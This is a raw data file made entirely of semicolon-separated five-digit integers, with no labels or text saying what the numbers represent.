52904;43277;62834;41031;40689;47787;47008;45217;30773;21682;42194;54417;47829;12007;26671;38899;58800;30304;34178;63064;29315;33399;21240;66351;38349;22720;30456;45303;58375;25124;24359;56155;44055;24792;42794;60729;37065;34001;55075;45823;45413;46448;55432;39815;29007;39561;58029;55430;60779;61329;34988;64890;46524;30049;65505;19310;20414;52286;10323;19372;59402;23589;30679;63726;13993;18510;21443;42882;39348;26845;11520;30059;63467;13175;34270;34047;27572;62895;64731;37570;59305;63067;33631;33439;54943;37094;35991;44604;60860;25922;26104;37954;26888;16942;57535;12947;25009;47627;25196;45439;52668;19256;18441;15396;28237;49923;43405;33618;56351;21604;27916;13951;59424;50543;39285;10769;20310;47406;64103;40949;51534;47625;65425;59399;36704;30056;27361;44246;16730;60704;32451;43225;41053;17405;24177;41728;26212;10453;26591;32129;35056;18914;46259;66792;36274;34108;36564;40642;18218;32642;31757;25468;22854;21468;62776;18897;40809;17113;45038;49814;57926;42466;55034;48674;13761;63824;53761;33251;27153;64465;23847;43814;21925;25445;19173;51773;34928;14336;53473;58795;44377;63310;32643;22128;47120;56680;20339;56047;60178;32105;45692;32710;14280;32193;42952;23107;27871;22200;46098;22735;56019;45987;61651;35480;16717;13933;55781;50159;38587;64163;34045;52878;10021;39030;43947;14627;46190;66937;33714;26773;60987;31314;49618;19925;31467;31460;38314;47637;65175;43335;23914;23220;49212;51304;14075;20333;53220;26408;10503;58120;49706;40702;33338;48503;32561;58561;20628;58206;66464;41141;54803;48788;49634;13313;18440;54642;43013;16223;15920;64086;53926;35268;11647;12966;60327;38342;13801;26521;25473;65990;21419;25213;31569;52655;23933;27151;34831;43508;41581;64750;55366;49470;24783;33309;50594;51371;59624;19451;49960;25704;27733;62380;10628;56236;28017;14344;29616;36678;37786;20847;56119;30780;39498;15644;34782;39429;48315;23228;52886;11181;12619;10545;43857;18536;49352;41030;32287;58368;18305;63342;24448;61532;64085;57156;52764;22129;31101;20973;51836;46359;54602;10072;30285;48510;52743;33424;11279;26289;52445;44081;27835;48759;43546;55133;64574;43076;33242;17529;19598;41028;11384;52124;64846;34896;35804;54825;56980;59286;12047;57672;55935;15999;15657;48415;55340;56498;26400;51533;13695;57422;18552;34484;58977;32990;26267;50637;21051;21814;36094;34405;65221;54630;53251;41638;26739;57911;64571;14302;52242;12394;50353;65635;37499;55012;55891;66790;46513;15496;23504;57699;44825;14403;66930;62262;51052;48938;12064;21246;35391;50427;63520;20074;37722;39194;43608;11726;49774;24423;28842;43242;28454;16363;38284;29166;57357;31533;59161;20903;28228;64797;46780;24328;31769;43502;66929;57078;53272;20081;66433;60458;24633;45158;15078;49970;41663;57276;26561;38778;28358;58284;47011;34406;60758;61679;58391;63904;16447;32169;46327;18645;45756;34237;34229;30128;49587;51306;41843;10914;19108;44221;29243;17322;62923;34088;66618;43389;14557;46135;49459;64007;32328;53094;41914;47067;35017;28226;35933;40801;32299;60068;51571;13378;65703;48789;66824;18412;65901;66781;18651;36952;12750;27324;32055;49921;34146;42418;30799;49466;48687;13363;46187;37678;24379;32104;16148;65682;57605;50394;60094;48678;24870;25865;56854;21337;20912;25635;24913;64556;14202;22845;54062;30401;53872;49449;29700;47387;60726;56513;11699;57441;29803;40503;46081;45357;37900;42673;48634;65746;11510;22722;56405;10855;43179;66771;21381;14093;24409;35262;40828;21570;17571;63757;40442;31692;51295;47293;25573;21141;15950;42184;55656;13705;50380;18787;13417;10663;29713;55261;15573;41596;58409;13871;37552;58353;27409;37939;12580;36587;19128;44992;22910;27603;42446;14154;55565;33328;66744;23622;44132;16688;24654;16924;63295;19124;26337;51122;29005;62768;14638;18848;48485;57785;53617;48676;28652;46578;21908;51058;14553;51991;44441;50276;18723;18523;18786;13070;26023;62300;61576;42163;39309;57484;45240;13143;41860;57505;58011;13057;20237;20326;29570;29035;31986;25498;16084;34784;39943;48509;57769;15721;44808;22495;64428;65718;17797;28716;64549;65358;53409;57433;49403;66663;49485;60229;61474;58524;12656;37635;30738;13827;18491;56390;50091;49455;56414;33079;27146;51024;44527;61209;63313;61110;44242;55493;41420;22164;55159;26801;23135;49204;66766;37471;12854;14002;25665;55073;13551;61672;34160;24759;66024;65376;48985;43523;13025;54003;27099;24960;34159;26098;53207;60167;48544;61276;22392;62946;13242;17147;56369;18200;50602;10396;50697;62142;28824;12048;43329;34602;20646;19411;64876;19727;52401;12812;64444;30331;30210;14244;39056;47581;56063;20904;16987;47644;11258;20684;52172;50913;21753;19746;18667;32393;48496;14446;50997;65665;48418;30795;53133;33047;48594;47810;63919;44092;42610;29871;15784;21638;22813;43189;13776;21815;43586;33563;55849;53789;49341;37184;22202;53291;28255;14584;62584;65312;57257;19252;60132;23172;42490;31542;46986;39894;14141;45549;55170;61421;52610;16124;11681;15360;23884;27488;46281;43999;57544;55032;36366;57555;53786;19069;35995;59172;45572;46841;41898;38527;26087;42672;11099;59810;31796;28372;46869;26796;41203;17150;40990;44588;38560;45680;14417;12328;36476;14747;23745;34981;57917;59276;25589;61413;40139;54596;25738;14170;45670;36993;16106;50805;26959;15087;31473;64417;60266;29862;58791;18768;58042;25263;46931;26646;63544;54109;46658;24742;51127;13671;28623;48388;45001;25078;34806;60761;20299;10306;24310;22950;24586;61826;46308;43404;18844;40562;45760;39502;52760;47866;61388;20564;23086;28122;34461;45891;41188;29066;54874;27365;49003;46283;37811;57330;66472;31611;44304;23669;36719;60849;18561;29701;65517;37583;41900;32172;55279;14074;20144;23100;22980;42751;63031;53020;42607;37104;53495;27984;16046;52466;42704;50423;41029;58067;42640;17061;52039;65268;26233;29618;49615;24099;31210;65231;25195;33479;34507;17048;51448;20315;52973;45904;48732;63557;32578;19554;28953;18033;29402;50075;54378;57879;41665;51599;63560;33128;55828;49127;41238;23537;18086;60938;16852;26049;13010;54524;32708;64520;54677;30352;55796;20723;62390;64472;54756;16555;31653;12761;10798;60514;18980;48440;22429;51157;56253;18976;23997;56799;45942;36311;20984;13115;32247;54462;44260;32212;11741;54213;30174;45633;18943;14800;44027;22195;37823;17115;41832;12763;66367;58136;48990;43219;36125;35183;54561;14107;20165;17374;29050;34179;58742;32879;49454;41244;48605;35752;41165;57147;47019;40721;28462;63724;59797;43052;28718;28732;31665;27326;61824;23604;51057;59080;48368;52640;42342;35706;20158;10747;40504;27770;60740;60250;19862;31818;21055;15607;50856;33073;64164;46718;43246;45922;12199;32376;28332;61897;17407;29926;46528;36043;34431;28964;46671;18714;12358;62094;43421;33535;43188;57364;50161;66144;29021;28176;23211;29608;10498;23319;13369;38098;22956;41931;19007;61294;45543;37059;63934;27489;32102;22515;37042;23174;15708;30206;32463;22430;49367;22247;12869;30491;30234;53637;39070;20697;42146;29823;10625;46148;59183;36257;33129;62395;52634;33896;42953;63209;10615;45590;60471;59933;35275;61502;26703;44481;51578;20965;11138;50149;65804;41519;64946;39044;64108;26674;40219;55861;63034;17448;42170;35410;66554;58692;66101;52593;28854;12473;37870;64739;12349;17838;65132;56395;27747;45785;39570;17327;55858;56674;14273;43614;10256;15466;61272;10434;61793;53525;37006;24974;49048;49719;60119;27787;33581;46994;18979;23715;39286;25896;47319;63471;43884;48672;29524;57412;36286;53324;51343;50250;64427;55571;16777;24525;63452;45232;53998;31602;62503;33655;47209;42204;56471;60055;49287;22863;48652;44615;60846;37293;63679;39020;49094;56783;37316;29702;24046;60807;63866;18454;12811;61111;27582;26342;21053;22640;49601;30037;13607;23133;56495;46116;42980;59262;59391;44098;61181;44395;28880;60882;13460;21105;39648;12983;23939;11100;58936;25286;51527;17635;40779;64948;58943;13656;21826;45067;20445;11816;54829;25063;58137;25825;12251;66787;53177;38368;13383;32412;18580;37572;61264;45477;58832;66236;59440;48209;57460;55517;26887;66734;61387;33794;33355;10361;25346;33922;38808;38483;15741;17124;55972;36922;29388;64949;60238;30989;58546;62256;29934;12367;63778;48437;65301;31235;47844;18935;53016;25430;44344;59646;13872;55046;49654;59081;31052;65062;57444;34253;29620;56812;21166;33366;26858;50200;27657;21476;45813;17133;44958;52215;32057;62092;15164;46124;27123;18818;20923;45253;64422;46644;15876;62355;34074;52206;53805;47675;64446;25472;28600;15081;57515;62294;52076;26173;58745;66945;31478;33829;59505;46590;29103;46104;49073;16062;26404;16414;22451;23948;17393;16907;35591;59648;22872;10263;32787;48272;48852;33109;24043;58490;30921;23179;46018;15308;25164;66227;54638;62148;46926;65988;38277;54574;29520;30258;37620;49280;37738;59204;58899;46662;20311;58218;20627;18001;33211;61981;52567;43599;13905;30822;33301;44558;62612;15702;58786;42069;22480;59066;29604;62956;65627;41634;50788;58501;64426;22428;50184;21803;16481;47177;52625;62570;14414;55444;16391;52700;50236;23720;56352;23376;10305;49689;17837;52057;31658;60168;15214;25238;11925;49521;62598;51029;59905;39979;14650;40706;43273;55263;10511;41507;50974;10504;15600;46566;36402;58551;36847;34289;23391;17183;41057;54097;63659;53187;39271;54598;11343;43903;39425;32286;49099;11377;23857;25669;59065;31939;30227;64625;32588;53408;46929;16003;30663;52116;50417;35688;32316;12018;58721;55702;47224;59678;22914;36164;33873;48537;24344;59950;28769;32140;48735;47758;13443;64856;34835;42084;63962;30962;12480;29537;56913;43004;66784;63434;49875;14150;38223;51641;28339;50093;38696;58128;47838;58414;34635;23439;55191;39600;39918;59531;55779;60600;29058;30192;12091;38003;33552;22672;30541;63015;58062;56188;39130;45034;33368;10284;38789;12944;31178;25803;35853;51985;52034;41584;52251;52314;41790;35201;48715;14574;45547;13501;63887;29997;52339;18996;54912;51359;50678;24178;42985;46760;18847;21875;53459;54356;15410;60544;13338;31157;13246;57052;62449;58645;28131;43569;48372;47453;34786;24518;25113;26188;50023;20869;14776;30834;19758;18929;50086;31743;37557;52945;63731;58618;14694;30508;54525;52562;58929;59686;61990;40707;58708;42335;47595;44009;23330;37381;29785;40790;47633;35876;35741;24900;46177;41772;24468;29762;64601;62176;12785;23908;11378;16674;33061;25052;33641;54426;23143;52419;35711;64350;65686;42326;29249;19158;56862;29311;21762;64798;11759;12674;58924;40974;54804;64561;24352;38781;11673;43861;15829;32634;21095;46713;64017;48844;50986;14989;66225;31816;44648;13865;41080;10295;48355;64560;43544;21983;53964;37445;32835;50658;20127;39064;33771;62916;52934;23251;24320;65516;57537;66002;13449;43433;36023;48698;26779;63853;19617;51751;35660;10518;40551;65671;59437;13824;15672;65991;23489;29291;42064;55806;54891;24242;65894;20593;57242;13201;32014;26576;43834;18468;12054;13087;14821;47040;19650;16856;51071;14102;24642;38387;38627;60214;40144;34197;51840;16424;40289;14098;35090;30529;42344;65422;13533;37676;19717;55954;45612;29305;59478;52735;52328;37451;44122;50181;25246;22509;17487;47440;60526;37880;41553;33219;48250;16798;16886;31707;16381;10490;41533;15326;51820;37041;11322;60626;11321;25018;55331;32534;43707;34791;43312;48468;45515;41429;46674;19200;15483;45160;20327;57593;56957;14863;34549;57881;36463;66089;55319;31120;56214;38266;39380;10476;26036;54515;44633;25553;29076;35716;64886;20812;33127;16915;28248;47197;24339;57198;53292;61718;26860;13590;17047;20548;15243;51979;53520;12042;35036;19083;19542;34654;34879;29908;10125;57456;21355;45910;51864;10697;59238;32930;45006;24537;49163;26527;12499;40732;42814;45368;61236;26863;65849;28831;59289;19440;45948;23524;35757;58788;58566;35796;54888;31140;52086;38623;22713;60243;13936;13319;35753;18612;60964;34547;39195;62818;33877;24129;62458;35178;44124;61404;50345;11583;60203;63908;43721;51405;54967;20494;38800;58286;42706;31434;15701;27769;55137;11710;62111;33510;41240;15865;49444;43543;59132;28120;16645;32255;64871;46077;39692;24976;49000;45403;61245;23264;41372;56329;43272;39632;29969;33536;14387;23065;19807;31397;15348;50586;43255;14020;48205;62428;18874;12453;54935;59537;30200;26230;45359;30465;56130;48399;59988;34012;45535;60228;36567;66913;34420;64812;53817;59831;31328;24566;53976;28937;61879;57130;26029;27701;53925;17112;49757;52186;36962;27700;58830;37875;48937;28657;27031;52930;60434;31034;45395;13876;30021;13098;51040;22101;44622;50862;44640;43828;10843;35043;36941;50546;42218;43158;50709;56343;54351;41891;45567;32448;37163;30146;59964;65799;50854;22160;61231;54297;14672;47656;14591;10429;57192;13399;62504;36831;38091;18572;57745;21186;41565;57314;29197;51464;16671;33695;54904;60818;49577;33325;64386;19282;51050;51964;46090;66366;30770;25056;19594;39900;29326;30389;57040;53883;32468;29976;42799;64238;66244;15556;61983;35517;44168;45394;16266;19028;23626;46897;41463;14652;27064;26781;55981;14217;27065;41145;39270;10391;51177;22359;62654;10020;24549;20790;37610;41878;60208;62754;55135;42990;22659;23980;17284;37145;44743;16135;19340;16476;16546;47646;64363;29547;51072;44235;41255;52600;19649;25388;48670;20279;20371;65915;45584;20802;66067;22363;13794;51837;56105;60680;37077;17808;51793;40863;13199;27702;45314;24196;34186;24183;11292;45654;45935;57589;44523;26072;51381;47349;18300;32543;54953;55576;46716;64820;65683;21236;27101;55300;60116;32366;43143;39504;15455;62319;63327;60436;11754;13377;59319;33344;43398;35872;66843;62187;52691;10809;19772;17984;11642;64456;30930;23840;18623;38092;23985;28113;44215;35131;62593;65557;55374;29503;25267;19015;66964;17412;42205;11472;22717;50971;29129;32613;50685;64157;37888;35185;59566;12268;60557;54498;32852;41439;59636;46376;22204;22798;12590;29508;48354;49049;19036;25221;40510;56668;13180;27431;25045;54937;54920;55617;18178;36757;20828;17134;62996;33934;22670;38533;58813;60981;12264;54001;22242;22031;37419;60575;61875;57377;65279;58892;65685;29689;48923;51621;19396;35533;24316;36058;58870;56647;63190;31212;32265;19302;17578;12636;30640;11241;33658;36806;62709;60123;30563;29409;32337;38239;14061;61296;33216;48180;24186;44890;54436;23334;23402;61587;47459;56516;60025;52352;50651;53758;47678;32390;30983;27154;43742;40476;32134;54613;29312;22967;62998;22368;32326;19001;60795;57937;31525;33067;12530;41705;49902;32928;55912;45866;66655;29337;64280;59359;57086;16763;30065;34659;27423;60851;34278;60837;14810;37190;39031;49305;46207;54259;21652;33684;64215;49808;66027;65287;38206;17696;16211;14264;24036;65015;50150;27094;41547;13998;25550;39873;51028;28554;27962;20989;20307;64436;34886;42735;24909;62532;28178;24871;40819;22861;41401;20884;13232;45629;46531;33313;10733;12415;18860;48571;56788;11860;29182;40840;53541;43555;31704;14983;48734;45521;62606;50893;39786;13436;43268;55120;65396;44691;31957;47645;45278;49662;12680;65088;59544;63561;17767;40933;53422;24601;48663;13736;43695;29629;34122;65933;55511;19711;65533;51084;61765;28737;11227;34823;44681;57360;30829;10614;65767;61444;49604;14844;19756;20209;49606;33382;24635;49129;14257;49885;21544;23710;20410;37775;14979;38805;33122;24143;22461;51316;20361;16751;18005;28490;13716;34387;63184;32336;62975;52298;26986;13852;29765;49834;52134;34867;58058;52806;24244;24041;47031;52374;34371;61868;37591;11332;16483;66250;10752;39859;17580;10554;66488;58411;31886;53852;64268;39156;58376;53946;19332;12991;22823;16725;20964;49068;65697;34210;39123;48564;17089;59023;44584;10627;35631;64224;17331;55412;24060;33244;37267;31979;23329;28198;36042;59017;30690;48845;55103;39661;38147;52475;61367;31033;51945;39438;54016;48794;62268;57957;22575;12360;10322;18403;44741;37788;44821;58619;41895;47539;63436;13262;58806;41264;15338;47836;28702;51476;58873;20244;20809;13004;12320;63254;54254;30726;22395;58733;57778;61616;44251;18682;21623;35100;25783;43516;44838;22102;38613;57265;39566;23787;53723;26958;28072;64035;50994;16729;43967;35257;20971;33484;24274;45213;55704;32184;29031;64686;55883;52123;25421;36331;30943;61394;66290;11803;36997;23137;52857;10687;49095;47685;28489;38262;60048;37709;60254;33474;40255;19135;53169;16328;16574;12550;32958;15707;31879;62258;39096;16508;16482;55890;22390;45619;45972;58295;47247;29627;15422;14015;26998;49575;42927;17839;61014;66455;63044;40463;46060;46000;22027;41040;62638;15560;39414;18807;24482;15034;55039;28330;46257;59386;61204;64824;10109;30973;22321;33828;17064;19818;36473;26380;17523;45055;52670;46219;60352;33705;21953;14510;29345;41825;49835;43784;15801;59912;33541;33823;43735;38109;56784;20834;45378;48666;28302;64884;45131;32961;54173;39685;60833;22517;35944;26714;25773;32072;58565;20314;12565;62700;64769;48339;45008;45578;64167;14194;27041;66626;65967;19839;45153;65963;44352;25075;58639;45212;13293;19125;54069;63134;54221;13874;26261;40754;62125;41567;62325;43800;57698;23835;46037;32012;31142;12740;32762;40242;17130;49523;17521;27298;26945;16218;12880;37650;34359;65521;62488;39539;60173;50845;46820;49717;17001;34267;59941;26382;15343;14485;41658;24512;29924;65471;19905;41580;65917;15697;47218;39318;22753;42938;54368;63233;21364;16296;35488;59641;64282;29653;21628;54212;61975;15922;65742;23132;12568;23295;27538;33639;15113;22365;24973;20234;21913;55189;19247;32455;50600;53980;37458;57131;60936;58587;21704;11339;25431;65185;41408;50551;31648;30424;38785;48308;61886;38250;25681;35422;55215;62524;13904;56869;34249;28931;41023;66610;38554;45591;25334;63423;28294;31015;40438;28069;34392;48908;65464;21446;58344;16731;17252;60588;28636;61298;17347;60777;39578;13154;66764;59457;17416;63252;60292;65143;54558;50192;38013;23022;44209;16616;40930;11864;25544;60296;47213;25577;43953;47073;13553;31207;19811;24817;62038;41003;47292;44317;29452;19291;60159;57035;54516;49022;34942;24068;28597;56355;65827;24748;42643;52177;26659;61834;21174;53101;27616;18992;46417;17724;39529;33432;49544;27696;40937;39305;27636;47832;52096;61184;44061;22527;47782;53940;47428;13198;39471;20995;30858;38178;66502;61378;28452;57845;51592;27354;50980;48531;34288;32623;58207;34994;39185;43351;35842;55089;33624;64772;64791;51755;22660;10044;41309;57158;59055;16691;29464;52012;65598;39469;52098;53947;28952;59697;50857;43168;34440;58549;34463;19093;12114;29928;21601;50769;33181;12819;31721;14626;41329;35780;15167;18902;59842;10170;47498;24341;10383;65741;61690;41684;54911;51779;54573;35443;41344;53750;64905;58170;27258;41925;42571;35971;35085;61962;44198;35046;37308;15329;36438;64322;54934;57002;30643;51016;21038;21892;44139;30256;60815;15624;42211;45765;65070;21506;52643;48522;49416;11304;17544;11907;56433;34810;12098;23466;21390;32774;40030;24995;24980;16072;39288;22135;50097;39932;58298;41047;62350;32825;58223;60110;19105;15695;56802;22518;20143;16761;55162;57455;38488;12511;53791;54774;38961;61655;33785;13489;49612;12491;13223;44327;11856;53969;14080;13614;50725;51735;30912;57614;14499;46173;46733;58555;16770;28997;42346;52605;43585;28980;35961;46660;64276;16878;50764;22465;47835;22550;66609;57375;23361;65887;55474;47882;11981;12096;45741;19194;13628;59836;27317;51386;54276;22549;26985;22626;22231;50202;39148;42093;13088;18703;37576;44171;40843;33556;41383;25729;59742;10501;51270;64372;48768;26722;57030;41999;14625;53356;37837;57732;39869;59115;41645;34399;58407;45163;20786;34541;36946;39440;30195;21363;22427;59094;64134;11346;55758;52270;66136;27881;63104;52755;43458;29380;49688;15336;30747;27953;45176;16412;54716;56834;28079;55168;33314;56504;60279;65854;50871;32682;39649;60143;37579;62995;49932;49602;13493;25565;50063;30344;52304;33787;63753;31508;56426;53481;61798;27060;16358;33488;39674;39437;45207;20124;54808;15500;27130;62007;33119;58981;57897;30362;53057;48498;16310;14427;35997;44109;42321;63986;60725;39046;48901;43902;18016;23543;61950;27387;16258;43744;40075;35603;35869;57885;66478;41662;56965;13170;57962;54593;18607;36846;31486;56475;43501;21729;53933;27647;23279;14889;66211;26204;37124;61279;56764;48316;24048;19548;66006;10329;53959;62137;57048;39324;34298;23976;60984;51149;49090;46980;31341;56046;27751;27227;51477;42099;10561;14885;20254;22364;42883;43942;43661;22467;29883;52207;42575;58864;40097;48333;17067;46895;24081;36588;34894;12757;22915;22063;30104;11997;18803;44356;58025;14671;36454;49136;37148;14457;45190;39712;13792;20666;55210;29567;41605;12038;51244;34091;45499;33470;47657;53083;34739;11293;13966;38246;22883;46741;60335;16650;20427;61820;22387;43346;44500;43760;39888;66768;15449;36998;18339;39449;38300;44415;11399;53313;33827;10927;26148;17235;36393;28205;11976;10551;45930;38793;43633;53551;12008;64952;54822;13347;46169;44613;37249;22001;28371;51283;40976;33386;61188;65303;62719;20031;43500;13407;13843;39377;15426;38259;26630;25674;62496;19503;26968;30964;65563;16581;28086;15689;15077;10085;46759;62758;15983;16510;56306;10451;13214;63859;15585;11771;40588;52360;40489;65265;33151;44253;31754;63864;52229;40392;54983;59355;54434;51223;12236;13184;19706;46958;46516;23450;26623;43733;12025;34749;54311;23267;62264;10543;15155;30467;66688;29319;53091;37312;52683;15254;53971;19621;36812;56423;19298;35418;24075;16758;63229;43050;38875;11424;29545;37916;42567;35622;18783;20640;56335;25691;45152;49620;18828;30067;47424;63752;13589;64016;37212;62686;51646;51982;35179;48873;60324;36220;33048;18922;25059;45323;28129;11861;63194;58525;32118;33421;26619;25308;18779;57355;66378;39443;12051;19170;39428;55706;25114;38180;26484;32886;23959;44013;65820;52024;61984;63477;16171;15026;41804;44833;28466;40118;52505;63305;62027;59594;15091;23400;10685;10513;65553;44660;38862;24473;17732;47781;19926;54947;54746;18881;31399;22647;28916;11253;26428;11839;50829;21378;17830;61693;55916;15242;51335;24357;64385;61305;24459;41514;48989;52737;46329;40049;11683;41621;41585;40786;25752;17534;27548;55830;38218;49344;49468;60174;41250;56876;35160;51389;12745;52664;58735;60180;20778;48704;13851;26833;12758;25838;62334;20042;54811;11170;62236;46435;53699;11095;34077;37177;14067;11042;54510;40197;13622;55705;54046;54440;62947;61760;55020;44069;55128;43437;54960;63097;42810;25252;35611;62097;19166;10650;36591;20625;32836;55395;60224;17281;15561;54552;32979;54661;13938;62130;29122;15994;36448;59162;61462;55742;51252;45128;30422;21153;29980;40736;16259;46680;32803;31503;56023;17246;53614;38334;22680;54775;42647;22599;29174;21225;34161;54877;50137;59118;42248;39670;49664;20395;43659;38704;55601;41928;14685;61804;53744;35899;52531;39052;41282;37233;66303;54435;33709;61669;20242;18407;22396;50145;50939;42130;50911;18579;54609;51865;26525;48282;42667;31981;14364;43369;57872;23374;30223;20506;15463;54505;27429;44562;53678;30439;39545;63633;27042;62603;49762;19152;18463;14597;63296;61930;40393;45078;60188;64250;54220;42240;45786;36152;33392;19120;33520;56655;52898;53485;59773;52740;63484;36901;26865;48885;34468;32058;49582;64762;40653;62291;34094;31123;45277;20295;32436;58105;30330;65811;34183;66807;61056;60732;57565;15207;60521;43390;20137;21770;10289;54326;13608;57436;31348;45665;59990;47078;47609;60303;29228;29826;23216;24408;24553;48446;22448;60011;15018;33478;52391;11128;33394;12700;54224;39951;45185;30883;40096;26071;36789;21304;18476;28967;24243;43423;63166;36852;52413;62850;61842;47900;34605;20091;46250;37119;56180;39225;48358;25549;25187;27543;11728;47636;21449;17970;23780;43505;29324;15531;21360;39825;10906;43230;27970;51649;28573;22613;66519;34279;24039;59911;45568;13899;52135;39217;63638;57119;41886;25641;36365;58522;36115;26761;11432;29825;23008;57583;23342;22333;23545;16552;64642;19406;16774;46246;26134;16104;40893;65284;11775;31040;53181;16660;37029;33330;11351;23553;60226;47084;44178;18794;57825;58320;36264;31646;28516;24388;20233;23883;50454;18882;26745;39307;17002;40561;55655;66887;22687;53318;59781;31884;16293;20421;39609;30734;33334;15080;39850;15383;40036;21158;12962;41235;27045;12294;19394;54776;66881;53237;33712;25979;47528;52433;44157;55590;32815;45990;51025;58494;64373;36561;28412;20968;45061;54310;60494;26043;25642;50414;30255;28107;25311;14987;18599;16438;32154;35866;33275;56542;29202;58296;51716;19284;19251;49669;24573;33117;53889;63002;48176;41259;33649;53684;32198;38879;37980;64562;35969;42966;49159;20228;17579;32586;40969;45513;18886;45414;16428;13059;24786;62299;23173;56115;56029;39154;37444;44994;24302;27305;41649;12475;31945;18080;51651;23176;24649;15125;52687;66601;60507;58285;33019;64072;43705;61130;61695;20495;15577;34608;26688;23487;28497;14026;36742;20192;38954;30684;55205;29839;58289;62745;56816;41777;52221;55348;11335;44351;57734;56035;25615;25511;27998;19688;55156;64122;33532;56586;28518;18471;24739;41518;32423;54010;27113;66769;46598;15836;21800;36810;54458;63735;20344;19032;26706;64349;43089;32889;64710;50005;12512;17036;50478;42121;45181;34836;23770;19504;30041;49659;25211;24855;33157;12968;65633;46069;27774;20894;39667;27360;34040;62911;32310;66040;28528;47026;41733;36960;49853;31044;58691;29718;61489;54217;23634;41730;38279;46393;24488;24607;41719;15767;44871;58557;22597;38927;24176;37160;29151;27372;53390;19104;58388;34369;66528;22280;27444;11092;12495;41193;33995;23645;25952;62090;49385;41738;21309;55332;20760;21034;43185;29636;38051;63952;33953;54414;23303;17815;19179;20907;26909;50776;45902;11027;21769;17553;51585;46275;36767;19910;29351;39984;22444;64031;35200;40935;55579;22533;31249;16911;34568;60162;51121;39162;10113;66330;37828;14433;22103;31356;59927;44057;29805;34630;44658;46761;64293;59479;34084;19658;59796;36488;57527;51030;61402;44926;23887;32526;44599;16092;53690;48575;25956;46530;55884;38146;47042;37017;57503;42703;45746;64486;43481;40593;62562;50737;39717;13131;23739;36124;34877;13005;13350;46367;15347;43935;65619;29494;24576;39411;14228;10972;43034;10023;15305;27202;24136;47484;29474;41110;62544;47590;54247;19482;49724;21020;38714;34859;17273;62484;41010;20457;44129;18954;56605;23248;63732;25492;27855;29892;26260;46836;17316;13000;66510;22552;10659;43649;39103;51094;51169;35140;64693;18264;56819;12519;38467;20225;43956;58012;55027;16643;43930;29495;49275;17104;35398;46314;29798;56032;56437;46038;27207;33751;37525;43334;60256;55743;56718;58413;60474;52203;35000;15843;28374;60858;17643;63719;45307;47614;49600;13670;12593;58420;65755;15833;64401;11228;36259;10948;39222;26461;40128;49084;30179;15641;55318;32121;44125;64528;37275;24031;39644;45391;10181;55392;20123;18735;30397;56612;52855;64896;29155;21520;26840;32653;19680;12931;49935;45173;52416;34873;40684;45098;13777;39280;36232;30451;46396;36980;28197;28624;38900;55629;46948;47092;41938;13148;30100;21784;49944;57396;18367;42112;42587;42179;31681;59523;38481;10512;39755;32001;52350;44912;54334;17039;31497;26016;12448;15354;17149;51917;66826;57823;28752;27690;20906;15860;57750;46801;61498;55701;27562;25159;22593;50836;63762;47098;46736;31563;24429;57882;35258;42338;38638;47666;11564;45744;66627;46974;19344;26826;60877;47891;55635;55939;48630;24071;65838;22749;51188;12036;62912;32760;22230;25166;64382;51336;26327;35782;38918;24958;54365;23414;15642;65708;18309;19341;23270;46398;39139;24850;10700;54073;16670;14703;29506;34738;13077;29563;57458;55098;22329;58444;31593;38041;37231;44757;54235;27036;65475;23949;56286;23092;58373;42208;44667;11048;35184;34451;51988;52775;66548;34971;61645;11843;51210;19033;41827;32233;48888;55669;30501;46889;61862;10121;33948;21028;13328;54249;41496;19496;31606;35150;59157;63080;55130;66780;39301;61192;35717;52308;33954;17063;41201;58578;44006;50004;45013;42809;38330;36377;53905;50915;64632;30534;15605;45360;41167;46979;54169;32779;42609;26452;33140;30444;10558;38592;21077;41837;47479;19316;27622;55141;60713;43511;56577;53821;19144;59152;33266;51469;41773;32637;65281;39458;38689;45211;15614;51803;53358;14117;22571;50982;40622;64618;56678;35403;18727;48546;33426;47611;39791;24561;43137;12949;11927;51665;17825;23569;57146;66415;53193;61740;11934;29335;64495;31934;37257;53597;22338;46025;53347;37285;45157;42870;38828;19882;17203;43492;30254;25290;46142;26592;23063;53046;22756;36744;36237;10709;31059;59726;38615;22643;39591;31380;26154;25819;26432;24916;31202;61363;45372;33102;24735;51431;10781;48432;48766;60571;11859;10103;52638;39733;36420;58982;27614;33547;27388;65743;33189;41121;17515;37511;55476;18327;21885;13879;37660;50068;63635;44381;26424;54021;61900;38894;24538;60332;40098;11220;41918;42244;15013;41403;42442;23946;38924;48377;36168;30087;61434;39248;25474;56694;36223;48346;51174;55252;40272;59695;64162;10094;60345;54542;36452;36609;59477;33101;65576;56380;53206;36424;62293;39723;19320;22224;49581;22556;30271;51623;21483;47468;60802;55893;52692;25080;45283;27919;64861;20962;36382;12779;34571;49215;36384;54837;47522;26977;18500;18371;66165;20318;65547;49818;58623;19567;34033;61185;15626;18172;24400;43302;57424;19161;13479;45268;41686;20080;66047;38594;63707;33277;50175;53491;39016;40107;31853;49093;43703;36418;16413;62626;27006;25853;53511;25090;18616;66746;51445;33943;11697;19995;27307;44671;28465;51998;41370;46168;34397;60479;38558;22192;57042;17375;40088;62939;49340;17367;15376;64055;45435;51296;63656;53218;50547;16805;54781;65900;34998;20681;41211;14322;48690;16563;42561;56737;22279;16744;31169;65429;14646;20426;50793;42320;20317;25630;19932;58602;47033;62862;49863;33748;26618;14715;66402;12253;26340;22114;64955;25833;49012;22646;44366;36150;15612;36803;29391;42092;31959;62050;17511;52394;62011;57757;16411;39188;58883;32302;51021;26988;32111;45494;16610;62928;17218;25249;41472;27100;45470;32911;48823;14849;64623;17471;35847;40357;42569;15492;54763;66447;44041;28065;37542;55684;46266;35536;32994;38693;36167;22018;23169;38112;60452;17659;21625;27948;46378;27530;66931;56192;35425;64302;15136;19614;38930;59699;11751;37320;32731;27718;19071;23434;60419;30791;19436;46870;65172;34624;49028;51262;43387;57394;28856;65951;19370;27754;61536;17794;31637;36045;32833;13764;24236;21973;64484;45656;65616;10302;36159;38182;31675;31564;60222;12306;15118;31071;28034;19253;34586;52598;62388;57902;18274;16330;25504;58037;41358;44416;11222;66916;13685;19188;59771;49140;46209;56665;42568;56294;30600;44758;43032;63056;41043;30242;14037;26269;11725;24245;23845;42386;36361;58711;22271;41959;14197;36958;31676;32712;32087;27055;50019;58512;35939;20863;35047;21340;10127;62865;50517;61770;52084;50085;10148;53140;28458;38974;54497;45777;30613;62061;64597;14759;43817;50708;18004;64408;36821;52568;48986;66544;22734;35650;22955;13858;13520;10536;39958;59972;20265;40914;45290;12939;31657;50363;16366;21116;19724;19873;37331;24329;42804;32182;66128;66493;51554;11631;60104;62881;65308;23044;42227;32798;63399;59255;33491;10401;14792;37621;46400;65205;40399;32767;11028;32496;39662;54927;19662;31079;54845;63525;